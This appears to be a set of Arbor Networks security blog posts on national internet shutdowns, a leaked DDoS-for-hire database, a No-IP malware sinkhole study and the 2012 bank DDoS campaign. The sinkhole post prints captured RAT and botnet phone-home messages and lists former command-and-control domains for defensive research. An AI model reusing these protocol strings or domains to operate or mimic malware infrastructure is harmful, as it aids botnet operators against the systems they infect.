January-February 2011: Egypt and Libya are taken offline entirely by their governments.

June 2011: Chinese and Vietnamese attackers started a cyber war over the territorial dispute on the ownership of the Spratly Islands in the South China Sea. 200 Vietnamese Web sites were attacked in June, and 10 percent of those Web sites were managed by government agencies; the attack disabled all the links on these Web sites and placed China’s flag at the center of the page.

March 20, 2013: S. Korean is targeted by N. Korea in series of cyberattacks and impacting 48,000 computers and servers, hampering banks for two to five days.

April 21, 2013: The U.S. military is increasing its budget for cyber warfare and expanding its offensive capabilities, including the ability to blind an enemy’s radar or shut down its command systems in the event of war, according to two defense officials.

May 2013: A new wave of attacked targeting U.S. energy companies begins, rumored to be driven out of the Middle East. Unlike typical cyberattacks that attempt to obtain confidential information, steal trade secrets and gain competitive advantage, these new attacks seek to destroy data or to manipulate industrial machinery and take over or shut down the networks that deliver energy or run industrial processes.

Again, I’ll leave it to others to debate the semantics of cyberwar. What I do know is that cyberspace is a legitimate battle space. The ongoing attacks against global financial services firms are a great example of how this impacts our business and day-to-day lives. Those attacks have been sustained for over six months, with no end in sight. They are being funded at some level, by someone or some group with very serious motivation that would be difficult to keep going with what we know of traditional hacktivism. We can speculate all day long about who might be behind these attacks but I’d suggest we leave that to others and focus on learning lessons and building better defenses. In this changing geo-political driven environment, understanding the ‘who’ can be near impossible with only digital attribution, but attempting to understand the potential motivation behind attacks can help to better gauge risk to your organization. What has really changed since Estonia? The fact that this type of attack today wouldn’t be nearly as surprising as it was in 2007.

 

Syria taken offline

By: Darren Anstee -

ATLAS is Arbor Networks innovative, one-of-a-kind Internet monitoring system. ATLAS is a collaborative effort with 250+ ISPs globally who have agreed to share anonymous traffic data on an hourly basis (leveraging Arbor’s technology that sits on ISP networks), together with data from Arbor dark address monitoring probes, as well as third-party and other data feeds. In total, ATLAS is seeing 42Tbps of peak IPv4 traffic. With this unique vantage point, Arbor is ideally positioned to deliver intelligence about malware, exploits, phishing and botnets that threaten Internet infrastructure and services. The information is aggregated, analyzed and fed back to our customers via our product deployments.

You can clearly see the traffic we are tracking for Syria drop to virtually 0 at 2000 UTC on the graph.  This will be approximately 1 hour after the drop happened in the ‘real’ world given that ATLAS participants only report hourly.

 

We’ve seen entire countries in the Mideast taken offline before. Here is a look back to January-February 2011 and Egypt,

Egypt Returns

 

 

 

 

 

 

Digging Through an “Administrative Network Stressor” Provider’s Database

By: Dennis Schwarz -

On March 15, 2013, Brian Krebs of Krebs on Security wrote “The World Has No Room For Cowards.” In it, he writes a fascinating story about a DDoS attack against his site and also a physical attack against his person. The part where Krebs’ notes that “… there are strong indications that a site named booter.tw may have been involved in the denial-of-service attack on my site yesterday. For some bone-headed reason, the entire customer database file for booter.tw appears to be available for download if you happen to the [sic] know the link to the archive” stood out to me. booter.tw advertises itself as “The Ultimate Administrative Network Stresser [sic] Tool.”

blog image 1

As a security researcher, getting access to a database dump associated with an incident is always interesting. An earlier version of the Krebs’ article linked to the database file, so the following are some quick bits and pieces I pulled out of it. Here is a geo IP location map of the ‘lastip’ field of the ‘users’ database table. The assumption here is that these are the last login IPs for the 312 users of the service. It is important to note that proxies, VPN services, the Tor network, and other IP anonymizing services come into play here and the IPs might not trace back to a user’s actual physical location.

 

blog image 2

The ‘attacks’ database table contains attacks from January 23, 2013 to March 15, 2013. There were 48,844 entries. Resolving hostnames and parsing out some junk IPs, close to 11,000 unique IPs were targeted. Here is a geo IP location map of the IPs.

blog image 3

 

The targeted IPs roughly map into the following organization types.

blog image 4

Assuming the ‘duration’ field is in seconds, the average attack duration was 34 minutes. Here is a breakdown of the different attack types:

blog image 5

This posting was a quick visualization of some of booter.tw’s database data as referenced by Krebs. I am glad that he and his family were unharmed during the associated “SWAT”ing attack and I look forward to reading his updates on this fascinating story.

Scavenging Connections On Dynamic-IP Networks Redux

By: Dennis Schwarz -

While a lot has changed since Seth McGann’s 1998 Phrack magazine article “Scavenging Connections On Dynamic-IP Networks,” it’s not hard to extrapolate his idea into modern day malware sinkholes. In this blog post we would like to share some of the connections scavenged over a short period from the No-IP dynamic DNS network–a network we run into time and time again in our malware analysis.

Malware campaigns have not been shy about using these and other dynamic DNS hostnames for their command & control (C&C) servers. With the price (free), dynamic nature, and anonymity (throw-away email addresses and proxies) it’s not hard to see the appeal. Using available APIs, malware authors are building in support directly into their bot builder kits as well.

no-ip

 No-IP support built-in to the Xtreme Remote Access Trojan (RAT)

Querying our malware zoo for the main free tier domain (no-ip.org) returns almost 6500 unique subdomains. As of this writing, about 4200 (64%) of these no longer resolve and are expired. As a proof of concept, we re-registered 100 of these sub-domains (see Appendix A) and in 4 groups of 25 sinkholed them for 3-4 days at a time. We used a simple sinkhole that redirected all TCP ports minus SSH (22) to a Python daemon that limited the connection time to 5 seconds and logged the first 2048 received bytes.

Disregarding general Internet background noise (hi critical.io, proxy scanners, and SQL Slammer), we received connections from around 6650 unique IPs distributed across the globe.

map

Map of source IPs connecting to a two-week sinkhole of 100 no-ip.org domains

Considering the low number of domains that were registered, many surprises and concerns cropped up. The sheer number of unique sources, geographical distribution, amount of traffic generated by abandoned bots (close to 7 GB of PCAP data), and the variety of malware families was interesting and insightful. There was good representation of both ASCII and binary blob communications, but the latter was more prevalent. The number of HTTP based phone homes was also lower than expected. Further analysis reveals the following interesting elements.

Xtreme RAT

There were two types of phone homes. The first includes a version string and we saw 2.9, 3.1, 3.2, and 3.5 Private (as of this writing, 3.6 is the latest publicly available). The second type of phone home message includes the password used in the campaign and we saw 123123, 87080060, and 1234567890 (default).

Type 1 (130 unique IPs)

myversion|2.9

Type 2 (57 unique IPs)

GET /1234567890.functions HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; 
SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center 
PC 6.0; InfoPath.2; .NET4.0C)
Host: XXX.no-ip.org:8089
Connection: Keep-Alive
Cache-Control: no-cache

DarkComet

Two types of phone homes were seen.

Type 1 (54 unique IPs)

D573BA5A4EFFC3FB629308

Type 2 (215 unique IPs)

KEEPALIVE8404156

Various IRC Bots (325 unique IPs)

As expected, IRC based bots were well represented. Some sample nicknames:

  • [iRooT-XP-CRI]702619
  • ESP|00|XP|SP3|8254484
  • {00-ITA-2K-ASP–6618}
  • ScAry0518258
  • pwned[00000]

Turkojan (75 unique IPs)

ams

CIA Trojan (3 unique IPs)

details;6333;Administrator;HOME;name;CIA 1.3;No;name

GhostHeart2 (2 unique IPs)

Starting at offset 13, zlib chunk.

00000000  47 68 30 73 74 61 00 00  00 b0 02 00 00 78 9c 4b Gh0sta.. .....x.K
00000010  63 60 60 98 03 c4 ac 40  cc 04 c4 e7 f8 20 f4 40 c``....@ ..... .@
00000020  02 0b 28 2d c4 c8 cc f0  81 0b e2 9e 03 2b 18 78 ..(-.... .....+.x
00000030  f2 72 72 93 49 35 ab 9c  91 81 e1 1e 2f 03 c3 17 .rr.I5.. ..../...
00000040  20 6d 64 60 68 84 2e 6f  7c e6 0d a5 ce 1d 05 54  md`h..o |......T
00000050  04 47 d6 9c 38 bf fd da  f5 97 b8 e4 01 82 d8 11 .G..8... ........
00000060  ac
.

MyRat (16 unique IPs)

Starting at offset 13, looks like a zlib chunk.

00000000  4d 79 52 61 74 b8 00 00  00 24 01 00 00 78 9c 4b MyRat... .$...x.K
00000010  8b 33 61 9a c3 c0 c0 c0  0a c4 8c 40 ac c1 c5 c0 .3a..... ...@....
00000020  c0 04 a4 83 53 8b ca 32  93 53 15 02 12 93 b3 15 ....S..2 .S......
00000030  8c 19 18 ae c4 98 30 fd  60 40 00 90 da 1b 46 4f ......0. `@....FO
00000040  18 5a 7d 67 17 86 c4 9a  80 b4 30 74 4a cd 2f 04 .Z}g.... ..0tJ./.
00000050  a9 b1 b0 16 66 c8 60 80  e8 61 66 80 98 07 52 cf ....f.`. .af...R.
00000060  06 c4 02 50 8c 02 14 a0  18 aa ee 25 50 13 33 98 ...P.... ...%P.3.
00000070  c3 c8 70 60 05 a3 e9 32  a0 e0 22 a8 bb 18 8a 0b ..p`...2 ..".....
00000080  52 53 53 d0 0d c0 0e fe  b3 33 30 5c 04 ea cd ae RSS..... .30....
00000090  48 2d 4e ce 2f 4a 65 00  ba 6b 81 2a 44 6e 31 d0 H-N./Je. .k.*Dn1.
000000A0  df 30 3b 97 dd de 70 6a  49 f8 de d2 a5 2e fb be .0;...pj I.......
000000B0  63 33 07 00 3f 40 28 73                          c3..?@(s

YoyoDDoS (471 unique IPs)

0xb8 variant.

00000000  79 6d 74 d8 68 90 95 8e  8f 8d d0 84 8d d1 d8 c1 ymt.h... ........
00000010  c6 c5 c8 d8 69 85 99 94  cd 7b 8f 8a 95 d8 68 8a ....i... .{....h.
00000020  8f 9b 95 8b 8b 8f 8a b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000030  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000040  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000050  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000060  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000070  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
00000080  cb cb ca c7 6d 7a b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ....mz.. ........
00000090  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
000000A0  67 91 8e d8 60 68 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 g...`h.. ........
000000B0  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
000000C0  e8 59 3c 56 3c 56 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 .Y<V
000000D0  b8 b8 b8 b8 b8 b8 b8 b8  b8 b8 b8 b8 b8 b8 b8 b8 ........ ........
000000E0  e1 b7 b8 b8                                      ....

Trojan.DDoser (5 unique IPs)

Base64 encoded.

*SNEW*/2||*||RGVmYXVsdA==||*||Uk8=||*||NC4y||*||WFAgeDg2||*||name||*|
|QVVUSExPQURFUkRFRkFVTFQ=||*||

Spy-Net RAT (19 unique IPs)

Base64 encoded.

hZGVPsqmMkI|

Unknown #1 (2 unique IPs)

104|OnConnect|United States|me|name - me|172.16.3.44|Not Detected|4.0.4 Update 2
|United States|OnConnect|

Unknown #2 (2 unique IPs)
Two version numbers were seen: 4.0 and 6.0.

LOGIN|Slovakia#SK|name and something like a password hash|#!#|pixel|name|name-
PC|Windows 7|Connection Established|Intel(R) Pentium(R) M processor 1600MHz 1598MHz
|0,5|Not Available|Not Available||140|4.0|123456

Unknown #3 (16 unique IPs)

Two version numbers were seen: 0.7 and 1.2.

02|Dell@DELL-name|XP/Vista|TR|1700|N|t+1.2|1.2|-|

This analysis of a small sample of No-IP domains and their associated malware gives us a tiny peek into some, possibly forgotten, attack campaigns and how active they can be. While No-IP and other dynamic DNS hostnames shouldn’t automatically be assumed to be bad, we feel they warrant further scrutiny and attention if seen on your networks.

It should come as no surprise  that there is a lot of malware out there, in all sorts of shapes and sizes. Sinkholing is just another tool in the malware researcher’s toolbox for the endless task of classifying, analyzing, and mitigating the shadier half of the Internet. In the meantime, the ASERT team work continues on the sinkholing project. Goals include expanding the scope, automating collection and classification as much as possible, and, of course, integrating the data into the ATLAS portal.

********

 Appendix 1: Domains 

Between Nov 6-8:sparkles.no-ip.orgloucoservegame.no-ip.orgwinchesterhacker.no-ip.orgmoof1.no-ip.orgtotty46.no-ip.orgmmsalti.no-ip.orgmaradona.no-ip.org

chmsou.no-ip.org

notiweb.no-ip.org

diddy69.no-ip.org

juventus-nando.no-ip.org

hoolaco.no-ip.org

by-brunix.no-ip.org

bolinha130.no-ip.org

rathacking786.no-ip.org

123boof.no-ip.org

gabrielzinho.no-ip.org

warez-kw.no-ip.org

demone2011.no-ip.org

markinyourdark.no-ip.org

amine69.no-ip.org

turkoloko.no-ip.org

bilal182010.no-ip.org

tucanoquebrado.no-ip.org

 

Between Nov 9 – 12

ibraaaaaa.no-ip.org

darthlord1.no-ip.org

aljaybol.no-ip.org

aidsvlek.no-ip.org

nomanvirus.no-ip.org

xtrema.no-ip.org

nonozin.no-ip.org

lance11111.no-ip.org

y2c.no-ip.org

pequenoserver.no-ip.org

bcsmetall.no-ip.org

deus-chess25.no-ip.org

memea7.no-ip.org

hermogenes.no-ip.org

anonymousbs2.no-ip.org

wellcomemagila.no-ip.org

wolver.no-ip.org

romerohacker.no-ip.org

difusao.no-ip.org

6thekey2.no-ip.org

180291.no-ip.org

hackerdr.no-ip.org

revoli.no-ip.org

anon1.no-ip.org

xupeta.no-ip.org

 

 

Between Nov 13 – 15:k4b000.no-ip.orgadelson3x.no-ip.orgmuerteya.no-ip.orgbnbtx.no-ip.org6shades16.no-ip.orgchivas.no-ip.orgmarcus3.no-ip.org

ilkkan.no-ip.org

desgarrada.no-ip.org

axf.no-ip.org

darkki123.no-ip.org

avisos.no-ip.org

bobharis.no-ip.org

ooooffff1.no-ip.org

tratt1.no-ip.org

evilsniper.no-ip.org

cust0.no-ip.org

lavitaebella.no-ip.org

es-imvu.no-ip.org

merda2.no-ip.org

darkcometx.no-ip.org

dark-sam.no-ip.org

victima123.no-ip.org

z-666.no-ip.org

fzlmo0s3.no-ip.org

tounsi-vip.no-ip.org

 

Between Nov 16 – 19:

helli1.no-ip.org

shootersiker.no-ip.org

adsll.no-ip.org

slow-v4.no-ip.org

bolinha2012.no-ip.org

6avhosts.no-ip.org

gandhihaxx.no-ip.org

kareemsql.no-ip.org

thedarkdkpiteur.no-ip.org

norhdsss.no-ip.org

xtremecheese.no-ip.org

froozen.no-ip.org

xxtreme.no-ip.org

x-treme.no-ip.org

ohgkm.no-ip.org

hackers1337x.no-ip.org

smoke1.no-ip.org

n00bz0r.no-ip.org

drico-drica.no-ip.org

shades16.no-ip.org

wkrldi132.no-ip.org

6blackhatt.no-ip.org

khabran.no-ip.org

6serverstatus11.no-ip.org

celsodns.no-ip.org

 

 

 

Lessons learned from the U.S. financial services DDoS attacks

By: Arbor Networks -

By Dan Holden and Curt Wilson of Arbor’s Security Engineering & Response Team (ASERT)

During the months of September and October we witnessed targeted and very serious DDoS attacks against U.S. based financial institutions. They were very much premeditated, focused, advertised before the fact, and executed to the letter.

In the case of the September 2012 DDoS attack series, many compromised PHP Web applications were used as bots in the attacks. Additionally, many WordPress sites, often using the out-of-date TimThumb plugin, were being compromised around the same time. Joomla and other PHP-based applications were also compromised. Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools. Attackers connect to the compromised webservers hosting the tools directly or through intermediate servers/proxies/scripts and issue attack commands. In the September 2012 attacks there were several PHP based tools used, the most prominent of which was “Brobot” along with two other tools, KamiKaze and AMOS which were used a bit less often.  Brobot has also been referred to as “itsoknoproblembro”.

The attack tactics observered were a mix of application layer attacks on HTTP, HTTPS and DNS with volumetric attack traffic on a variety of TCP, UDP, ICMP and other IP protocols. The other obvious and uncommon factor at play was the launch of simultaneous attacks, at high bandwidth, to multiple companies in the same vertical.

On December 10, 2012 the group claiming responsibility for the prior attacks, the Izz ad-Din al-Qassam Cyber Fighters announced “Phase 2 Operation Ababil”.  A new wave of attacks were announced on their Pastebin page:  which described their targets as follows:

“Continually, the goals under attacks of this week are including: U.S. Bancorp, JPMorgan Chase&co, Bank of America, PNC Financial Services Group, SunTrust Banks, Inc.”

On December 11, 2012, attacks on several of these victims were observed. Some attacks looked similar in construction to Brobot v1, however there is a newly crafted DNS packet attack and a few other attack changes in Brobot v2.

These attacks have shown why DDoS continues to be such a popular and effective attack vector. Yes, DDoS can take the form of very large attacks. In fact, some of this week’s attacks have been as large as 60Gbps. What makes these attacks so significant is not their size, but the fact that the attacks are quite focused, part of an ongoing campaign, and like most DDoS attacks quite public. These attacks utilize multiple targets, from network infrastructure to Web applications.

Lessons Learned

While there has been much speculation about who is behind these attacks, our focus is less on the who or why, but how we can successfully defend. There are multiple lessons to be learned from these attacks, by everyone involved – the targeted enterprises, their managed security providers, Website and Web application administrators, and the vendor community.

For enterprises, it is clear that typical perimeter defenses such as firewalls and IPS are not effective when dealing with DDoS attacks, as each technology inline to the target is actually a potential bottleneck. These devices can be an important part of a layered defense strategy but they were built for problems far different than today’s complex DDoS threat. Given the complexity of today’s threat landscape, and the nature of application layer attacks, it is increasingly clear that enterprises need better visibility and control over their networks which require a purpose built, on-premise DDoS mitigation solution. This could sound self-serving, however, visibility into a DDoS attack needs to be far better than the first report of your Website or critical business asset going down. Without real-time knowledge of the attack, defense and recovery becomes increasingly difficult.

For providers of managed security services, they have begun to evaluate their deployments and mitigation capacity. These attacks were unique in that they targeted multiple organizations within the same vertical, putting a strain on the capacity of provider’s cloud-based mitigation services.

What these attacks have continued to demonstrate is that DDoS will continue to be a popular and increasingly complex attack vector. DDoS is no longer simply a network issue, but is increasingly a feature or additional aspect of other threats. The motivation of modern attackers can be singular, but the threat landscape continues to become more complex and mixes various threats to increase the likelihood of success. There have certainly been cases where the MSSP was successful at mitigating against an attack but the target Website still went down due to  corruption of the underlying application and data. In order to defend networks today, enterprises need to deploy DDoS security in multiple layers, from the perimeter of their network to the provider cloud, and ensure that on-premise equipment can work in harmony with provider networks for effective and robust attack mitigation.

 

Snapshot: Syria’s Internet drops, returns

By: Darren Anstee -

The Arbor ATLAS system leverages Arbor Networks’ world-wide service provider customer base to gather data about Internet traffic patterns and threats.  Currently 246 of Arbor’s customers are actively participating in the Arbor ATLAS system, and are sharing data on an hourly basis. The data shared includes information on the traffic crossing the boundaries of participating networks, and the kinds of DDoS attacks they are seeing. The graph below shows the cumulative ‘total’ traffic ( to / from) Syria across all of these participating networks. This does not the total traffic into and out of Syria, this is simply a snapshot taken from the vantage point of 246 network operators around the world.

As you can see traffic dropped sharply at around 1730 in the graph below.  The low level could either indicate a reduction in traffic to / from Syria or an outage for less than an hour (as the data is at one hour granularity). The actual traffic interruption is likely to have occurred at around 1630, the graphs show traffic interruption an hour later than this due to the variable, hourly reporting from ATLAS participants to our servers.

Syria goes dark

By: Darren Anstee -

UPDATE: Syria’s back online

 

ORIGINAL POST

The ATLAS infrastructure leverages Arbor Networks’ world-wide service provider customer base to gather data about Internet traffic patterns and threats.  Currently 246 of Arbor’s customers are actively participating in the ATLAS program, and are sharing data on an hourly basis.

The data shared includes information on the traffic crossing the boundaries of participating networks, and the kinds of DDoS attacks they are seeing. The graph below shows the cumulative ‘total’ traffic ( to / from) Syria across all of these participating networks. This does not show the total traffic into and out of Syria, this is simply a snapshot taken from the vantage point of 246 network operators around the world. As you can see traffic drops to virtually nothing earlier on today.  The actual traffic interruption is likely to have occurred between 1000 and 1100 today, the graphs show traffic interruption an hour later than this due to the variable, hourly reporting from ATLAS participants to our servers.

(UPDATED: as of 5:50am ET on 12/1/12)

 

As a reminder, this is not the first time we have seen a complete cut off of Internet access in the Middle East. You may recall back in January 2011, something similar occurred in Egypt,

 

Go Back In Time →